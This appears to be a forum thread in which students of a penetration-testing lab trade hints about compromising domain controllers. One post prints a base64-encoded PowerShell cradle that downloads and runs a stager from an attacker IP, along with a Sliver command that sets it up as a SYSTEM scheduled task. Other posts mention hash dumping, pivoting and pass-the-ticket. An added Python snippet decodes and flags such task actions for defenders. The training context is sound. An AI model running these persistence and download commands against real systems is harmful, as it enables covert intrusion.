I’ve been stuck on trying to access DC02 for days now. Anyone willing to give me a tip? I’ve rooted the foothold host and pulled all the hashes I could find. Got access to the Admin account, but it’s only the local admin. Can’t seem to gain access to the one I need to get to DC02.
I’m stuck in the same place. Have you figured it out yet?
I haven’t reached the Skills Assessment yet. I am lost in the “Assumed breach” section, “Establishing persistence” part.
It says “We will focus on the approach used in the Probing the surface section by downloading a staged.txt file”
$ echo -en "iex(new-object net.webclient).downloadString('http://10.10.14.62:8088/stager.txt')" | iconv -t UTF-16LE | base64 -w 0
aQBlAHgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANAAuADYAMgA6ADgAMAA4ADgALwBzAHQAYQBnAGUAcgAuAHQAeAB0ACcAKQA=
And then create a scheduled task like this:
sliver (http-beacon) > execute powershell 'schtasks /create /sc minute /mo 1 /tn SecurityUpdater /tr \"powershell.exe -enc aQBlAHgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANAAuADYAMgA6ADgAMAA4ADgALwBzAHQAYQBnAGUAcgAuAHQAeAB0ACcAKQA=\" /ru SYSTEM'
I did as was written but never got a shell back. Please help!
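Seen from the defender's side, the task action in the post above can be decoded and triaged directly from the scheduled-task command line. This is an added example, not part of the original post or the course material; the function names and marker list are assumptions chosen for illustration.

```python
import base64
import re

# Substrings typical of a PowerShell download cradle (compared in lowercase).
CRADLE_MARKERS = ("iex", "invoke-expression", "downloadstring", "net.webclient")
# A command-line flag followed by a long base64-looking argument.
FLAG_ARG = re.compile(r"[-/](\w+)\s+([A-Za-z0-9+/]{16,}={0,2})")
URL = re.compile(r"https?://[^\s'\")]+", re.I)


def encode_ps(command: str) -> str:
    """Same transform as `iconv -t UTF-16LE | base64 -w 0` in the post."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if absent/invalid."""
    for flag, blob in FLAG_ARG.findall(cmdline):
        # PowerShell accepts prefixes of -EncodedCommand (-e, -enc, ...) and -ec.
        flag = flag.lower()
        if not ("encodedcommand".startswith(flag) or flag == "ec"):
            continue
        try:
            return base64.b64decode(blob, validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            continue
    return None


def triage_task_action(cmdline: str) -> dict:
    """Summarise a scheduled-task action for an analyst."""
    decoded = decode_encoded_command(cmdline)
    text = (decoded or "").lower()
    markers = [m for m in CRADLE_MARKERS if m in text]
    return {
        "decoded": decoded,
        "markers": markers,
        "urls": URL.findall(decoded or ""),
        "suspicious": bool(decoded) and bool(markers),
    }


# Constructed sample: the task action from the post, rebuilt from its plaintext.
CRADLE = "iex(new-object net.webclient).downloadString('http://10.10.14.62:8088/stager.txt')"
SAMPLE_ACTION = f"powershell.exe -enc {encode_ps(CRADLE)}"

if __name__ == "__main__":
    print(triage_task_action(SAMPLE_ACTION))
```

The marker match is a triage heuristic; a task running as SYSTEM every minute with an encoded command deserves review even when no marker matches.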
If anyone needs help to get the third flag, feel free to hit me up.
I’m stuck at the last. If anyone has a hint, I’d appreciate it.
PS: I got it. It took me direct access to the host via pivot. You can also achieve it by generating a file and PtT.
Bro, can you give a hint to get a foothold from htb-student? Lol, I am stuck at the beginning, tried everything.
Run Sharphound
Bro, I'm stuck at the 3rd question. Can you help me, like how did you pivot to DC02?
Can you give a hint, please?
Did you find the script?
Yeah, and logged in to the MSSQL server, but I am having an error: when I am trying to upload a file to the MSSQL server, it freezes.
Bro, I already got DC02 but can’t dump hashes. Always an error like implant timeout, and after that the session closes by itself.